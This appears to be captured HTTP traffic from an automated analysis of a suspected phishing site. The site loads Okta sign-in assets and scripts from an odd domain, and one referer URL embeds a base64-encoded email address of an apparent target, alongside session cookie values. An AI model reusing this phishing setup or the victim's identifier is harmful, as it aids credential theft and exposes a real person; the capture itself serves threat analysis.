                Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://gt.prjnyvhqq.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /xyixa12teRvw6EcgFJBfEmmpisc51Ykqwg5ZTjQYHgVGrxljy HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlRaM2RPRUdodGdpWVJWOG0zMTN6NGc9PSIsInZhbHVlIjoibjlpNFRIT3RqVVptc0lHQXlPNXRncDRySXpHQVpDVGJaN3Q2TDVJaGlzNmdDU2p0ZmdlOXBqWFdwbXZzSXk1TDZEdXpIdUtMUnF1dzRUbXZXakh4SFhvc0J1eDJtZmtDOFNOSEwvb2NvYUxYdmw1VDErTllQRTcwOWl2N3JlN1IiLCJtYWMiOiIxNzE1ZmIwMmI1Y2MxZDQxZTAzYWUxZGQ4MWU0ZWRmZjgzNzhlYTU3YmNkMmUzNjAxODU1ZGRmNzAwYWIxYzEzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImwrbEp5TjdQa0tTNGpXZ2Z2NFp5WVE9PSIsInZhbHVlIjoiNW0zY1ZDUzVFV21xeDNGN3k1K2RnNEc4N29OOUxxR2txYkFGcFRhWEtabytsb0tXVDhtN2k1TEVSTFJSaWxpZUVhdU5ESHFKSnlCaE1zclNQenJMOEtvLzZRdlNGSGpMemhHR1VlUXZkOWlKdjI3YnpoeGlQSWdkNkVPeFBTOHciLCJtYWMiOiIzYjU5NDg3OTAxNWRlNDdkNGRiNGIzNDIzNGZjYjk0NzVmOTkwNTY2YTk4MWQyZGVkODZmYTkxYTJkM2ExZTAyIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUY HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://gt.prjnyvhqq.es/3EaWQm0/$bWljaGFlbC5kdW5uZUBxdmMuY29tAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlRaM2RPRUdodGdpWVJWOG0zMTN6NGc9PSIsInZhbHVlIjoibjlpNFRIT3RqVVptc0lHQXlPNXRncDRySXpHQVpDVGJaN3Q2TDVJaGlzNmdDU2p0ZmdlOXBqWFdwbXZzSXk1TDZEdXpIdUtMUnF1dzRUbXZXakh4SFhvc0J1eDJtZmtDOFNOSEwvb2NvYUxYdmw1VDErTllQRTcwOWl2N3JlN1IiLCJtYWMiOiIxNzE1ZmIwMmI1Y2MxZDQxZTAzYWUxZGQ4MWU0ZWRmZjgzNzhlYTU3YmNkMmUzNjAxODU1ZGRmNzAwYWIxYzEzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImwrbEp5TjdQa0tTNGpXZ2Z2NFp5WVE9PSIsInZhbHVlIjoiNW0zY1ZDUzVFV21xeDNGN3k1K2RnNEc4N29OOUxxR2txYkFGcFRhWEtabytsb0tXVDhtN2k1TEVSTFJSaWxpZUVhdU5ESHFKSnlCaE1zclNQenJMOEtvLzZRdlNGSGpMemhHR1VlUXZkOWlKdjI3YnpoeGlQSWdkNkVPeFBTOHciLCJtYWMiOiIzYjU5NDg3OTAxNWRlNDdkNGRiNGIzNDIzNGZjYjk0NzVmOTkwNTY2YTk4MWQyZGVkODZmYTkxYTJkM2ExZTAyIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /34r0UWURcdqG658918 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii95VWVJaExrdzErdE9iZTJoRVdIQnc9PSIsInZhbHVlIjoidjhNTGJiYjdhZzZqek1yaFV1YThEMWxrRWVQeGF0MkxZM29aWGJ0R0RFVWQ1R1VSZmVzOE91c25IMU9MN1hmbHJqZDZrRnNzdnNiN2NyRXZDSTEzaklRVnh4L3ZTbjdMTnJ6ZlhIUEpxTkNORS9xekZYb25mWFVuc0pvVFU5YUMiLCJtYWMiOiI2NjFiN2E1Y2Y1NDVmODRhOGI3OTNmMTUyMWUxMmEwNDRhZTFlZTRjOTEzZWQwYTU2MzcyZDFhYTBmZTg3MmNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlAxaGRwRnVUZE5zL2hYVVlNUTNubHc9PSIsInZhbHVlIjoiYVBVbnY3RTJ6akhXU1lENzFIY1BIUHg3d1FZTW5UcjcyNWpIYTRWd1ZTK1V3K01hbnVISU5CVVFWYnpkTW8vSmJ2aFY4NkhiQnhsVzJ6dzdmYnl1dGRaWTRUUEt3M0dqSXA1aUNpZDRYa2RobUtacW5aVjN1eENLcXJNUmlDZGIiLCJtYWMiOiJiZmJiZTJiNTVjODVkY2E3ZTdhMDRlZjU4YTBhNTM2MjhjYTYyMWE4MzNhNmUzZTVmNDEzM2M0YmZiZWFmZjhlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /abtGFSFdrsecd30 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii95VWVJaExrdzErdE9iZTJoRVdIQnc9PSIsInZhbHVlIjoidjhNTGJiYjdhZzZqek1yaFV1YThEMWxrRWVQeGF0MkxZM29aWGJ0R0RFVWQ1R1VSZmVzOE91c25IMU9MN1hmbHJqZDZrRnNzdnNiN2NyRXZDSTEzaklRVnh4L3ZTbjdMTnJ6ZlhIUEpxTkNORS9xekZYb25mWFVuc0pvVFU5YUMiLCJtYWMiOiI2NjFiN2E1Y2Y1NDVmODRhOGI3OTNmMTUyMWUxMmEwNDRhZTFlZTRjOTEzZWQwYTU2MzcyZDFhYTBmZTg3MmNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlAxaGRwRnVUZE5zL2hYVVlNUTNubHc9PSIsInZhbHVlIjoiYVBVbnY3RTJ6akhXU1lENzFIY1BIUHg3d1FZTW5UcjcyNWpIYTRWd1ZTK1V3K01hbnVISU5CVVFWYnpkTW8vSmJ2aFY4NkhiQnhsVzJ6dzdmYnl1dGRaWTRUUEt3M0dqSXA1aUNpZDRYa2RobUtacW5aVjN1eENLcXJNUmlDZGIiLCJtYWMiOiJiZmJiZTJiNTVjODVkY2E3ZTdhMDRlZjU4YTBhNTM2MjhjYTYyMWE4MzNhNmUzZTVmNDEzM2M0YmZiZWFmZjhlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff2 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-aliveOrigin: https://gt.prjnyvhqq.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii95VWVJaExrdzErdE9iZTJoRVdIQnc9PSIsInZhbHVlIjoidjhNTGJiYjdhZzZqek1yaFV1YThEMWxrRWVQeGF0MkxZM29aWGJ0R0RFVWQ1R1VSZmVzOE91c25IMU9MN1hmbHJqZDZrRnNzdnNiN2NyRXZDSTEzaklRVnh4L3ZTbjdMTnJ6ZlhIUEpxTkNORS9xekZYb25mWFVuc0pvVFU5YUMiLCJtYWMiOiI2NjFiN2E1Y2Y1NDVmODRhOGI3OTNmMTUyMWUxMmEwNDRhZTFlZTRjOTEzZWQwYTU2MzcyZDFhYTBmZTg3MmNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlAxaGRwRnVUZE5zL2hYVVlNUTNubHc9PSIsInZhbHVlIjoiYVBVbnY3RTJ6akhXU1lENzFIY1BIUHg3d1FZTW5UcjcyNWpIYTRWd1ZTK1V3K01hbnVISU5CVVFWYnpkTW8vSmJ2aFY4NkhiQnhsVzJ6dzdmYnl1dGRaWTRUUEt3M0dqSXA1aUNpZDRYa2RobUtacW5aVjN1eENLcXJNUmlDZGIiLCJtYWMiOiJiZmJiZTJiNTVjODVkY2E3ZTdhMDRlZjU4YTBhNTM2MjhjYTYyMWE4MzNhNmUzZTVmNDEzM2M0YmZiZWFmZjhlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-aliveOrigin: https://gt.prjnyvhqq.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii95VWVJaExrdzErdE9iZTJoRVdIQnc9PSIsInZhbHVlIjoidjhNTGJiYjdhZzZqek1yaFV1YThEMWxrRWVQeGF0MkxZM29aWGJ0R0RFVWQ1R1VSZmVzOE91c25IMU9MN1hmbHJqZDZrRnNzdnNiN2NyRXZDSTEzaklRVnh4L3ZTbjdMTnJ6ZlhIUEpxTkNORS9xekZYb25mWFVuc0pvVFU5YUMiLCJtYWMiOiI2NjFiN2E1Y2Y1NDVmODRhOGI3OTNmMTUyMWUxMmEwNDRhZTFlZTRjOTEzZWQwYTU2MzcyZDFhYTBmZTg3MmNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlAxaGRwRnVUZE5zL2hYVVlNUTNubHc9PSIsInZhbHVlIjoiYVBVbnY3RTJ6akhXU1lENzFIY1BIUHg3d1FZTW5UcjcyNWpIYTRWd1ZTK1V3K01hbnVISU5CVVFWYnpkTW8vSmJ2aFY4NkhiQnhsVzJ6dzdmYnl1dGRaWTRUUEt3M0dqSXA1aUNpZDRYa2RobUtacW5aVjN1eENLcXJNUmlDZGIiLCJtYWMiOiJiZmJiZTJiNTVjODVkY2E3ZTdhMDRlZjU4YTBhNTM2MjhjYTYyMWE4MzNhNmUzZTVmNDEzM2M0YmZiZWFmZjhlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff2 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-aliveOrigin: https://gt.prjnyvhqq.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii95VWVJaExrdzErdE9iZTJoRVdIQnc9PSIsInZhbHVlIjoidjhNTGJiYjdhZzZqek1yaFV1YThEMWxrRWVQeGF0MkxZM29aWGJ0R0RFVWQ1R1VSZmVzOE91c25IMU9MN1hmbHJqZDZrRnNzdnNiN2NyRXZDSTEzaklRVnh4L3ZTbjdMTnJ6ZlhIUEpxTkNORS9xekZYb25mWFVuc0pvVFU5YUMiLCJtYWMiOiI2NjFiN2E1Y2Y1NDVmODRhOGI3OTNmMTUyMWUxMmEwNDRhZTFlZTRjOTEzZWQwYTU2MzcyZDFhYTBmZTg3MmNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlAxaGRwRnVUZE5zL2hYVVlNUTNubHc9PSIsInZhbHVlIjoiYVBVbnY3RTJ6akhXU1lENzFIY1BIUHg3d1FZTW5UcjcyNWpIYTRWd1ZTK1V3K01hbnVISU5CVVFWYnpkTW8vSmJ2aFY4NkhiQnhsVzJ6dzdmYnl1dGRaWTRUUEt3M0dqSXA1aUNpZDRYa2RobUtacW5aVjN1eENLcXJNUmlDZGIiLCJtYWMiOiJiZmJiZTJiNTVjODVkY2E3ZTdhMDRlZjU4YTBhNTM2MjhjYTYyMWE4MzNhNmUzZTVmNDEzM2M0YmZiZWFmZjhlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-aliveOrigin: https://gt.prjnyvhqq.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii95VWVJaExrdzErdE9iZTJoRVdIQnc9PSIsInZhbHVlIjoidjhNTGJiYjdhZzZqek1yaFV1YThEMWxrRWVQeGF0MkxZM29aWGJ0R0RFVWQ1R1VSZmVzOE91c25IMU9MN1hmbHJqZDZrRnNzdnNiN2NyRXZDSTEzaklRVnh4L3ZTbjdMTnJ6ZlhIUEpxTkNORS9xekZYb25mWFVuc0pvVFU5YUMiLCJtYWMiOiI2NjFiN2E1Y2Y1NDVmODRhOGI3OTNmMTUyMWUxMmEwNDRhZTFlZTRjOTEzZWQwYTU2MzcyZDFhYTBmZTg3MmNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlAxaGRwRnVUZE5zL2hYVVlNUTNubHc9PSIsInZhbHVlIjoiYVBVbnY3RTJ6akhXU1lENzFIY1BIUHg3d1FZTW5UcjcyNWpIYTRWd1ZTK1V3K01hbnVISU5CVVFWYnpkTW8vSmJ2aFY4NkhiQnhsVzJ6dzdmYnl1dGRaWTRUUEt3M0dqSXA1aUNpZDRYa2RobUtacW5aVjN1eENLcXJNUmlDZGIiLCJtYWMiOiJiZmJiZTJiNTVjODVkY2E3ZTdhMDRlZjU4YTBhNTM2MjhjYTYyMWE4MzNhNmUzZTVmNDEzM2M0YmZiZWFmZjhlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://gt.prjnyvhqq.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://gt.prjnyvhqq.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://gt.prjnyvhqq.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://gt.prjnyvhqq.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /GDSherpa-vf.woff2 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-aliveOrigin: https://gt.prjnyvhqq.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii95VWVJaExrdzErdE9iZTJoRVdIQnc9PSIsInZhbHVlIjoidjhNTGJiYjdhZzZqek1yaFV1YThEMWxrRWVQeGF0MkxZM29aWGJ0R0RFVWQ1R1VSZmVzOE91c25IMU9MN1hmbHJqZDZrRnNzdnNiN2NyRXZDSTEzaklRVnh4L3ZTbjdMTnJ6ZlhIUEpxTkNORS9xekZYb25mWFVuc0pvVFU5YUMiLCJtYWMiOiI2NjFiN2E1Y2Y1NDVmODRhOGI3OTNmMTUyMWUxMmEwNDRhZTFlZTRjOTEzZWQwYTU2MzcyZDFhYTBmZTg3MmNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlAxaGRwRnVUZE5zL2hYVVlNUTNubHc9PSIsInZhbHVlIjoiYVBVbnY3RTJ6akhXU1lENzFIY1BIUHg3d1FZTW5UcjcyNWpIYTRWd1ZTK1V3K01hbnVISU5CVVFWYnpkTW8vSmJ2aFY4NkhiQnhsVzJ6dzdmYnl1dGRaWTRUUEt3M0dqSXA1aUNpZDRYa2RobUtacW5aVjN1eENLcXJNUmlDZGIiLCJtYWMiOiJiZmJiZTJiNTVjODVkY2E3ZTdhMDRlZjU4YTBhNTM2MjhjYTYyMWE4MzNhNmUzZTVmNDEzM2M0YmZiZWFmZjhlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-vf2.woff2 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-aliveOrigin: https://gt.prjnyvhqq.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii95VWVJaExrdzErdE9iZTJoRVdIQnc9PSIsInZhbHVlIjoidjhNTGJiYjdhZzZqek1yaFV1YThEMWxrRWVQeGF0MkxZM29aWGJ0R0RFVWQ1R1VSZmVzOE91c25IMU9MN1hmbHJqZDZrRnNzdnNiN2NyRXZDSTEzaklRVnh4L3ZTbjdMTnJ6ZlhIUEpxTkNORS9xekZYb25mWFVuc0pvVFU5YUMiLCJtYWMiOiI2NjFiN2E1Y2Y1NDVmODRhOGI3OTNmMTUyMWUxMmEwNDRhZTFlZTRjOTEzZWQwYTU2MzcyZDFhYTBmZTg3MmNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlAxaGRwRnVUZE5zL2hYVVlNUTNubHc9PSIsInZhbHVlIjoiYVBVbnY3RTJ6akhXU1lENzFIY1BIUHg3d1FZTW5UcjcyNWpIYTRWd1ZTK1V3K01hbnVISU5CVVFWYnpkTW8vSmJ2aFY4NkhiQnhsVzJ6dzdmYnl1dGRaWTRUUEt3M0dqSXA1aUNpZDRYa2RobUtacW5aVjN1eENLcXJNUmlDZGIiLCJtYWMiOiJiZmJiZTJiNTVjODVkY2E3ZTdhMDRlZjU4YTBhNTM2MjhjYTYyMWE4MzNhNmUzZTVmNDEzM2M0YmZiZWFmZjhlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /34fDlhbhAZQZgS98w6PXi3wgh9MhxLvtFGDDs89105 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii95VWVJaExrdzErdE9iZTJoRVdIQnc9PSIsInZhbHVlIjoidjhNTGJiYjdhZzZqek1yaFV1YThEMWxrRWVQeGF0MkxZM29aWGJ0R0RFVWQ1R1VSZmVzOE91c25IMU9MN1hmbHJqZDZrRnNzdnNiN2NyRXZDSTEzaklRVnh4L3ZTbjdMTnJ6ZlhIUEpxTkNORS9xekZYb25mWFVuc0pvVFU5YUMiLCJtYWMiOiI2NjFiN2E1Y2Y1NDVmODRhOGI3OTNmMTUyMWUxMmEwNDRhZTFlZTRjOTEzZWQwYTU2MzcyZDFhYTBmZTg3MmNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlAxaGRwRnVUZE5zL2hYVVlNUTNubHc9PSIsInZhbHVlIjoiYVBVbnY3RTJ6akhXU1lENzFIY1BIUHg3d1FZTW5UcjcyNWpIYTRWd1ZTK1V3K01hbnVISU5CVVFWYnpkTW8vSmJ2aFY4NkhiQnhsVzJ6dzdmYnl1dGRaWTRUUEt3M0dqSXA1aUNpZDRYa2RobUtacW5aVjN1eENLcXJNUmlDZGIiLCJtYWMiOiJiZmJiZTJiNTVjODVkY2E3ZTdhMDRlZjU4YTBhNTM2MjhjYTYyMWE4MzNhNmUzZTVmNDEzM2M0YmZiZWFmZjhlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250325%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250325T122336Z&X-Amz-Expires=300&X-Amz-Signature=9b1147548c36b6c2cf31537e7e8afe11e5eb21dd7a39903e846b207ab537fc34&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://gt.prjnyvhqq.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
